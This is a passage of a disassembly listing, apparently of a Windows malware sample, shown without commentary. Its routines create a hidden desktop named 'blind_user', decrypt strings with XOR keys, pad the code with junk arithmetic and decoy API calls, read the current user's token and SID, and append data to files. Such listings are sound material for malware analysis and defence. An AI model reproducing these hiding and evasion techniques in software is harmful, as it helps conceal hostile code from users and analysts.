lea eax, dword_430C30[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043CA proc near ; CODE XREF: sub_4061F7+22C�p
; sub_408B4C+1AB�p
var_10 = dword ptr -10h
var_A = word ptr -0Ah
var_7 = byte ptr -7
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea edi, [ebp+var_7]
lea esi, dword_442238
mov ecx, 3
rep movsb
cmp dword_442234, 0
jz short loc_404422
mov [ebp+var_A], 4080h
movzx eax, [ebp+var_A]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_A], ax
call sub_40C740 ; GetCurrentThreadId
push eax
call sub_40CA58 ; GetThreadDesktop
mov [ebp+var_10], eax
call sub_40C794 ; GetProcessHeap
mov eax, dword_442234
cmp [ebp+var_10], eax
jnz short loc_404450
xor eax, eax
inc eax
jmp short loc_404469
; ---------------------------------------------------------------------------
loc_404422: ; CODE XREF: sub_4043CA+20�j
push 0
push 0C7h
push 0
push 0
push 0
push offset aBlind_user ; "blind_user"
call sub_40CA40 ; CreateDesktopA
mov dword_442234, eax
call sub_40C740 ; GetCurrentThreadId
cmp dword_442234, 0
jnz short loc_404450
xor eax, eax
jmp short loc_404469
; ---------------------------------------------------------------------------
loc_404450: ; CODE XREF: sub_4043CA+51�j
; sub_4043CA+80�j
push dword_442234
call sub_40CA4C ; SetThreadDesktop
mov [ebp+var_4], eax
mov ebx, 5CBAh
mov ecx, ebx
add ecx, ebx
mov ebx, ecx
loc_404469: ; CODE XREF: sub_4043CA+56�j
; sub_4043CA+84�j
pop edi
pop esi
pop ebx
leave
retn
sub_4043CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40446E proc near ; CODE XREF: sub_4061F7+2C6�p
; sub_408B4C+230�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edi
mov edi, 1763h
add edi, 25D9h
mov eax, [ebp+arg_0]
lea edx, aBlind_user ; "blind_user"
mov [eax+8], edx
call sub_40C794 ; GetProcessHeap
pop edi
pop ebp
retn
sub_40446E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404491 proc near ; CODE XREF: sub_404586+7�p
; sub_4045EF-2C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_442244
lea eax, ds:4176F0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov [ebp+var_4], 5Dh
xor edi, edi
jmp short loc_4044D9
; ---------------------------------------------------------------------------
loc_4044BF: ; CODE XREF: sub_404491+4A�j
mov eax, dword_442244
add eax, edi
lea eax, ds:4176F0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0B6h
mov [eax], dl
inc edi
loc_4044D9: ; CODE XREF: sub_404491+2C�j
cmp edi, esi
jl short loc_4044BF
mov eax, dword_442244
add eax, esi
mov byte ptr ds:dword_4176F0[eax], 0
xor edi, edi
mov edi, dword_442244
add dword_442244, 2
mov eax, dword_442244
add eax, 5
add eax, esi
mov dword_442244, eax
cmp eax, 0DD3h
jle short loc_404518
and dword_442244, 0
loc_404518: ; CODE XREF: sub_404491+7E�j
mov [ebp+var_8], 165h
lea eax, dword_4176F0[edi]
sub_404491 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404525 proc near ; DATA XREF: sub_43F725+A6�o
pop edi
pop esi
leave
retn
sub_404525 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404529 proc near ; CODE XREF: sub_4054C8+702�p
; sub_4054C8+7C6�p ...
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 114h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C740 ; GetCurrentThreadId
push [ebp+arg_4]
push ebx
call sub_40CC74
add esp, 8
call sub_40C854 ; IsDebuggerPresent
lea edi, [ebp+var_100]
lea esi, byte_442248
xor ecx, ecx
inc ecx
rep movsb
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404641
call sub_40C794 ; GetProcessHeap
mov [ebp+var_FF], 0
call sub_40C764 ; RtlGetLastWin32Error
sub_404529 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404586 proc near ; DATA XREF: sub_43F725+476�o
push 3
push offset aSC ; ""
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
call sub_40C794 ; GetProcessHeap
mov byte ptr [ebp-101h], 0
jmp short loc_404605
sub_404586 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4045EF
loc_4045AA: ; CODE XREF: sub_4045EF+1E�j
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_4045FE
push 4
push offset aUU ; "œ"
call sub_404491
mov [ebp-108h], eax
call sub_40CC38
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-108h]
push edi
; END OF FUNCTION CHUNK FOR sub_4045EF
; =============== S U B R O U T I N E =======================================
sub_4045EF proc near ; DATA XREF: sub_43F725+4B8�o
; FUNCTION CHUNK AT 004045AA SIZE 00000045 BYTES
lea edi, [ebp-0FFh]
push edi
call sub_40CC50
add esp, 18h
loc_4045FE: ; CODE XREF: sub_4045EF-35�j
add byte ptr [ebp-101h], 1
loc_404605: ; CODE XREF: sub_404586+22�j
mov al, [ebp-101h]
cmp al, 0Ah
jb short loc_4045AA
call sub_40C740 ; GetCurrentThreadId
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CC74
call sub_40C854 ; IsDebuggerPresent
push 3
push offset aCS ; ""
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 18h
call sub_40C854 ; IsDebuggerPresent
loc_404641: ; CODE XREF: sub_404529+46�j
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404721
call sub_40C740 ; GetCurrentThreadId
push 10h
push offset aCuUUClcuN ; "ĖՓՓՖÍ"
call sub_404491
mov [ebp-108h], eax
call sub_40CC38
mov [ebp-10Ch], eax
call sub_40CC38
mov [ebp-110h], eax
call sub_40CC38
mov [ebp-114h], eax
call sub_40CC38
mov ecx, 0EA60h
cdq
idiv ecx
push edx
mov edi, [ebp-114h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-110h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-10Ch]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-108h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CC50
mov byte ptr [ebp-101h], 80h
add byte ptr [ebp-101h], 1
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CC74
sub_4045EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40470D proc near ; DATA XREF: sub_43F725+600�o
add esp, 28h
lea edi, [ebp-102h]
lea esi, byte_442249
xor ecx, ecx
inc ecx
rep movsb
loc_404721: ; CODE XREF: sub_4045EF+62�j
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_4047EE
mov byte ptr [ebp-101h], 6Ch
movzx eax, byte ptr [ebp-101h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-101h], al
push 0Ah
push offset aSsuUU ; "ՓՓջ"
call sub_404491
mov [ebp-108h], eax
call sub_40CC38
mov [ebp-10Ch], eax
call sub_40CC38
mov [ebp-110h], eax
call sub_40CC38
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-110h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
sub_40470D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40479E proc near ; DATA XREF: sub_43F725+502�o
add edi, 61h
push edi
mov edi, [ebp-10Ch]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-108h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CC50
mov byte ptr [ebp-102h], 0ABh
sub byte ptr [ebp-102h], 19h
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CC74
add esp, 24h
call sub_40C854 ; IsDebuggerPresent
loc_4047EE: ; CODE XREF: sub_40470D+24�j
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404816
push 2
push offset asc_447400 ; ""
sub_40479E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404807 proc near ; DATA XREF: sub_43F725+52D�o
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404816: ; CODE XREF: sub_40479E+60�j
pop edi
pop esi
pop ebx
leave
retn
sub_404807 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40481B proc near ; CODE XREF: sub_4054C8+1A2�p
; sub_4054C8+1D3�p ...
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_141 = byte ptr -141h
var_13B = byte ptr -13Bh
var_136 = word ptr -136h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_129 = byte ptr -129h
var_120 = byte ptr -120h
var_108 = dword ptr -108h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 150h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov [ebp+var_108], 53AAh
inc [ebp+var_108]
push [ebp+arg_4]
push ebx
call sub_40CC74
add esp, 8
lea edi, [ebp+var_120]
lea esi, aKCivm ; "K CiM "
movsd
movsd
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404A43
call sub_40C794 ; GetProcessHeap
mov [ebp+var_FF], 0
mov [ebp+var_130], 55F4h
inc [ebp+var_130]
push 5
push offset aKciic ; ""
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
call sub_40C7D0 ; GetVersion
mov [ebp+var_129], 0
jmp loc_4049F9
; ---------------------------------------------------------------------------
loc_4048AD: ; CODE XREF: sub_40481B+1E6�j
call sub_40C740 ; GetCurrentThreadId
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404906
push 4
push offset aUU ; "œ"
call sub_404491
mov [ebp+var_148], eax
call sub_40CC38
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_148]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40CC50
add esp, 18h
loc_404906: ; CODE XREF: sub_40481B+A7�j
lea edi, [ebp+var_13B]
lea esi, aByqv ; "BYQV"
mov ecx, 5
rep movsb
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40496D
push 4
push offset aUU ; "œ"
call sub_404491
mov [ebp+var_14C], eax ; DATA XREF: sub_43F725+41D�r
call sub_40CC38
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_14C]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40CC50
add esp, 18h
loc_40496D: ; CODE XREF: sub_40481B+10E�j
lea edi, [ebp+var_141]
lea esi, a4lk ; "&*4LK"
mov ecx, 3
rep movsw
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 7
jge short loc_4049D5
push 4
push offset aUU ; "œ"
call sub_404491
mov [ebp+var_150], eax
call sub_40CC38
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_150]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40CC50
add esp, 18h
loc_4049D5: ; CODE XREF: sub_40481B+176�j
mov [ebp+var_136], 61C9h
movzx eax, [ebp+var_136]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_136], ax ; DATA XREF: sub_43F725+2A�o
add [ebp+var_129], 1
loc_4049F9: ; CODE XREF: sub_40481B+8D�j
mov al, [ebp+var_129]
cmp al, 0Ah
jb loc_4048AD
lea eax, [ebp+var_FF]
push eax
push ebx
call sub_40CC74
call sub_40C734 ; GetCurrentProcessId
push 4
push offset aIiic ; ""
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 18h
mov [ebp+var_134], 46D8h ; DATA XREF: sub_440126+12�o
sub [ebp+var_134], 3C21h
loc_404A43: ; CODE XREF: sub_40481B+49�j
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404BD4
mov [ebp+var_130], 53ABh
add [ebp+var_130], 4F65h
mov [ebp+var_FF], 0
mov eax, dword_44225D
mov [ebp+var_134], eax
mov [ebp+var_129], 0
jmp loc_404BB6
sub_40481B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404B85
loc_404A8B: ; CODE XREF: sub_404B85+39�j
call sub_40C794 ; GetProcessHeap
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404AE4
push 4
push offset aUU ; "œ"
call sub_404491
mov [ebp-144h], eax
call sub_40CC38
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-144h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CC50
add esp, 18h
loc_404AE4: ; CODE XREF: sub_404B85-E5�j
mov eax, dword_442261
mov [ebp-138h], eax
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404B43
push 4
push offset aUU ; "œ"
call sub_404491
mov [ebp-148h], eax
call sub_40CC38
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-148h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CC50
add esp, 18h
loc_404B43: ; CODE XREF: sub_404B85-86�j
lea edi, [ebp-13Fh]
lea esi, byte_442265
mov ecx, 7
rep movsb
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 3
jge short loc_404BAA
push 4
push offset aUU ; "œ"
call sub_404491
mov [ebp-14Ch], eax
call sub_40CC38
mov ecx, 9
cdq
; END OF FUNCTION CHUNK FOR sub_404B85
; =============== S U B R O U T I N E =======================================
sub_404B85 proc near ; DATA XREF: .data:00440382�o
; .data:004403A9�o ...
; FUNCTION CHUNK AT 00404A8B SIZE 000000FA BYTES
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-14Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CC50
add esp, 18h
loc_404BAA: ; CODE XREF: sub_404B85-1F�j
call sub_40C7C4 ; GetTickCount
add byte ptr [ebp-129h], 1
loc_404BB6: ; CODE XREF: sub_40481B+26B�j
mov al, [ebp-129h]
cmp al, 32h
jb loc_404A8B
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CC74
add esp, 8
loc_404BD4: ; CODE XREF: sub_40481B+238�j
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404BFC
push 4
push offset aKI ; "Ĉ"
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404BFC: ; CODE XREF: sub_404B85+5F�j
lea edi, [ebp-128h]
lea esi, aRmU ; ": &rm`U"
movsd
movsd
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404C32
push 3
push offset aKI_3 ; "Ԉ"
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404C32: ; CODE XREF: sub_404B85+95�j
mov dword ptr [ebp-104h], 384h
mov eax, [ebp-104h]
mov edx, eax
add edx, eax
mov [ebp-104h], edx
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404C74
push 3
push offset aKI_2 ; "È"
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404C74: ; CODE XREF: sub_404B85+D7�j
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404C9C
push 3
push offset aKI_1 ; "߈"
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404C9C: ; CODE XREF: sub_404B85+FF�j
call sub_40C7C4 ; GetTickCount
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404CC9
push 4
push offset aKsI ; "߈"
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404CC9: ; CODE XREF: sub_404B85+12C�j
mov dword ptr [ebp-10Ch], 0F10h
inc dword ptr [ebp-10Ch]
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D01
push 4
push offset aKsI_0 ; "Ԉ"
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404D01: ; CODE XREF: sub_404B85+164�j
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D29
push 4
push offset aKsI_1 ; "È"
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404D29: ; CODE XREF: sub_404B85+18C�j
call sub_40C7C4 ; GetTickCount
sub_404B85 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D2E proc near ; DATA XREF: .data:0043FFA8�o
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D56
push 7
push offset aKsI_2 ; ""
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404D56: ; CODE XREF: sub_404D2E+10�j
mov dword ptr [ebp-110h], 7CCAh
mov eax, 23D9h
mul dword ptr [ebp-110h]
mov [ebp-12Ch], eax
mov [ebp-110h], eax
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D9F
push 8
push offset aKI_0 ; "Ĉ"
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404D9F: ; CODE XREF: sub_404D2E+59�j
mov dword ptr [ebp-114h], 2CE7h
inc dword ptr [ebp-114h]
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404DD7
push 9
push offset aKsI_3 ; "Ĉ"
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404DD7: ; CODE XREF: sub_404D2E+91�j
mov dword ptr [ebp-118h], 35B7h
mov eax, 4085h
mul dword ptr [ebp-118h]
mov [ebp-130h], eax
mov [ebp-118h], eax
call sub_40CC38
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E20
push 2
push offset asc_447400 ; ""
call sub_404491
push eax
push ebx
call sub_40CC74
add esp, 10h
loc_404E20: ; CODE XREF: sub_404D2E+DA�j
call sub_40C734 ; GetCurrentProcessId
pop edi
pop esi
pop ebx
leave
retn
sub_404D2E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E2A proc near ; CODE XREF: sub_404EC6+5C�p
; sub_404EC6+91�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 12Bh
push esi
push [ebp+arg_0]
mov eax, dword_44227C
lea eax, ds:436250h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov [ebp+var_8], 283h
xor edi, edi
jmp short loc_404E77
; ---------------------------------------------------------------------------
loc_404E60: ; CODE XREF: sub_404E2A+4F�j
mov eax, dword_44227C
add eax, edi
lea eax, ds:436250h[eax]
movsx edx, byte ptr [eax]
xor edx, 7Bh
mov [eax], dl
inc edi
loc_404E77: ; CODE XREF: sub_404E2A+34�j
cmp edi, esi
jl short loc_404E60
mov [ebp+var_C], 10Ch
mov eax, dword_44227C
add eax, esi
mov byte ptr ds:dword_436250[eax], 0
xor edi, edi
mov edi, dword_44227C
add dword_44227C, 3
mov eax, dword_44227C
lea eax, [eax+esi+3]
mov dword_44227C, eax
cmp eax, 0DEDh
jle short loc_404EBC
and dword_44227C, 0
loc_404EBC: ; CODE XREF: sub_404E2A+89�j
lea eax, dword_436250[edi]
pop edi
pop esi
leave
retn
sub_404E2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404EC6 proc near ; CODE XREF: sub_40506F+99�p
var_30 = dword ptr -30h
var_2A = byte ptr -2Ah
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_19 = dword ptr -19h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_15], 0C0h
sub [ebp+var_15], 75h
mov eax, dword_442280
mov [ebp+var_19], eax
xor ebx, ebx
inc ebx
push [ebp+arg_0]
call sub_40CB9C ; GetSidIdentifierAuthority
mov [ebp+var_14], eax
call sub_40C740 ; GetCurrentThreadId
push [ebp+arg_0]
call sub_40CBB4 ; GetSidSubAuthorityCount
movzx edi, byte ptr [eax]
mov [ebp+var_10], edi
call sub_40C7C4 ; GetTickCount
mov eax, 0Ch
mul [ebp+var_10]
mov [ebp+var_20], eax
add eax, 1Ch
mov [ebp+var_C], eax
loc_404F16: ; DATA XREF: .data:off_4472A3�o
call sub_40C7C4 ; GetTickCount
push 6
push offset byte_4473B3
call sub_404E2A
push ebx
push eax
push [ebp+arg_4]
call sub_40CA7C ; wsprintfA
add esp, 14h
mov [ebp+var_C], eax
add eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_14]
cmp byte ptr [eax], 0
jnz short loc_404F4B
cmp byte ptr [eax+1], 0
jz short loc_404FA9
loc_404F4B: ; CODE XREF: sub_404EC6+7D�j
call sub_40C734 ; GetCurrentProcessId
push 20h
push offset word_447392
call sub_404E2A
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx esi, si
push esi
movzx esi, byte ptr [edi+4]
movzx esi, si
push esi
movzx esi, byte ptr [edi+3]
movzx esi, si
push esi
movzx esi, byte ptr [edi+2]
movzx esi, si
push esi
movzx esi, byte ptr [edi+1]
movzx esi, si
push esi
movzx edi, byte ptr [edi]
movzx edi, di
push edi
push eax
push [ebp+var_8]
call sub_40CA7C ; wsprintfA
add esp, 28h
mov ebx, eax
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
jmp short loc_405017
; ---------------------------------------------------------------------------
loc_404FA9: ; CODE XREF: sub_404EC6+83�j
mov [ebp+var_24], 5F0h
mov eax, 4B0Ah
mul [ebp+var_24]
mov [ebp+var_30], eax
mov [ebp+var_24], eax
push 3
push offset word_44738E
call sub_404E2A
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx edx, byte ptr [edi+4]
shl edx, 8
add esi, edx
movzx edx, byte ptr [edi+3]
shl edx, 10h
add esi, edx
movzx edi, byte ptr [edi+2]
shl edi, 18h
add esi, edi
push esi
push eax
push [ebp+var_8]
call sub_40CA7C ; wsprintfA
add esp, 14h
mov ebx, eax
lea edi, [ebp+var_2A]
lea esi, aO68_0 ; "o6,%8"
mov ecx, 3
rep movsw
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
loc_405017: ; CODE XREF: sub_404EC6+E1�j
and [ebp+var_4], 0
jmp short loc_405062
; ---------------------------------------------------------------------------
loc_40501D: ; CODE XREF: sub_404EC6+1A2�j
call sub_40C764 ; RtlGetLastWin32Error
push 4
push offset byte_447389
call sub_404E2A
mov [ebp+var_24], eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40CBA8 ; GetSidSubAuthority
push dword ptr [eax]
mov edi, [ebp+var_24]
push edi
push [ebp+var_8]
call sub_40CA7C ; wsprintfA
add esp, 14h
mov ebx, eax
call sub_40C734 ; GetCurrentProcessId
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
inc [ebp+var_4]
loc_405062: ; CODE XREF: sub_404EC6+155�j
mov eax, [ebp+var_10]
cmp [ebp+var_4], eax
jb short loc_40501D
pop edi
pop esi
pop ebx
leave
retn
sub_404EC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40506F proc near ; CODE XREF: sub_405E88+239�p
var_19 = byte ptr -19h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_B = byte ptr -0Bh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_B]
lea esi, word_44228A
mov ecx, 3
rep movsb
call sub_40C734 ; GetCurrentProcessId
mov [ebp+var_8], eax
lea edi, [ebp+var_10]
lea esi, aGK ; "`G k"
mov ecx, 5
rep movsb
push [ebp+var_8]
push 0
push 1F0FFFh
call sub_40C89C ; OpenProcess
mov ebx, eax
call sub_40C7D0 ; GetVersion
lea eax, [ebp+var_4]
push eax
push 0F00FFh
push ebx
call sub_40CB24 ; OpenProcessToken
call sub_40C734 ; GetCurrentProcessId
push ebx
call sub_40C7AC ; CloseHandle
mov eax, dword_442278
add eax, 3FF4h
push eax
push 40h
call sub_40C878 ; LocalAlloc
mov ebx, eax
lea eax, [ebp+var_14]
push eax
mov eax, dword_442278
add eax, 3FF4h
push eax
push ebx
push 1
push [ebp+var_4]
call sub_40CB30 ; GetTokenInformation
call sub_40C7D0 ; GetVersion
push [ebp+arg_0]
push dword ptr [ebx]
call sub_404EC6
add esp, 8
push ebx
call sub_40C884 ; LocalFree
call sub_40C854 ; IsDebuggerPresent
push [ebp+var_4]
call sub_40C7AC ; CloseHandle
lea edi, [ebp+var_19]
lea esi, asc_442292 ; "> `h"
mov ecx, 5
rep movsb
pop edi
pop esi
pop ebx
leave
retn
sub_40506F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405138 proc near ; CODE XREF: sub_40523D+52�p
; sub_40523D+BD�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_4422A0
lea eax, ds:4197B0h[eax]
push eax
call sub_40CC14
add esp, 0Ch
xor edi, edi
jmp short loc_405176
; ---------------------------------------------------------------------------
loc_40515F: ; CODE XREF: sub_405138+40�j
mov eax, dword_4422A0
add eax, edi
lea eax, ds:4197B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 3Ch
mov [eax], dl
inc edi
loc_405176: ; CODE XREF: sub_405138+25�j
cmp edi, esi
jl short loc_40515F
mov [ebp+var_4], 365h
mov eax, dword_4422A0
add eax, esi
mov byte ptr ds:dword_4197B0[eax], 0
xor edi, edi
mov edi, dword_4422A0
mov eax, edi
add eax, 2
add eax, esi
mov dword_4422A0, eax
cmp eax, 0DDFh
jle short loc_4051B2
and dword_4422A0, 0
loc_4051B2: ; CODE XREF: sub_405138+71�j
mov [ebp+var_8], 0E8h
lea eax, dword_4197B0[edi]
pop edi
pop esi
leave
retn
sub_405138 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4051C3 proc near ; CODE XREF: sub_4061F7+526�p
; sub_4061F7+543�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
push edi
call sub_40C740 ; GetCurrentThreadId
push 0
push 80h
push 4
push 0
push 0
push 0C0000000h
push [ebp+arg_0]
call sub_40C8CC ; CreateFileA
mov edi, eax
call sub_40C7D0 ; GetVersion
cmp edi, 0FFFFFFFFh
jnz short loc_4051F8
xor eax, eax
jmp short loc_405239
; ---------------------------------------------------------------------------
loc_4051F8: ; CODE XREF: sub_4051C3+2F�j
mov esi, 3356h
sub esi, 0F1Dh
push 2
push 0
push 0
push edi
call sub_40C8D8 ; SetFilePointer
call sub_40C7D0 ; GetVersion
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_40C944 ; WriteFile
call sub_40C740 ; GetCurrentThreadId
push edi
call sub_40C7AC ; CloseHandle
call sub_40C740 ; GetCurrentThreadId
xor eax, eax
inc eax
loc_405239: ; CODE XREF: sub_4051C3+33�j
pop edi
pop esi
leave
retn
sub_4051C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40523D proc near ; CODE XREF: sub_4061F7+46F�p
var_2F5B = byte ptr -2F5Bh
var_2F58 = dword ptr -2F58h
var_2F53 = byte ptr -2F53h
var_2F52 = byte ptr -2F52h
var_2F4A = word ptr -2F4Ah
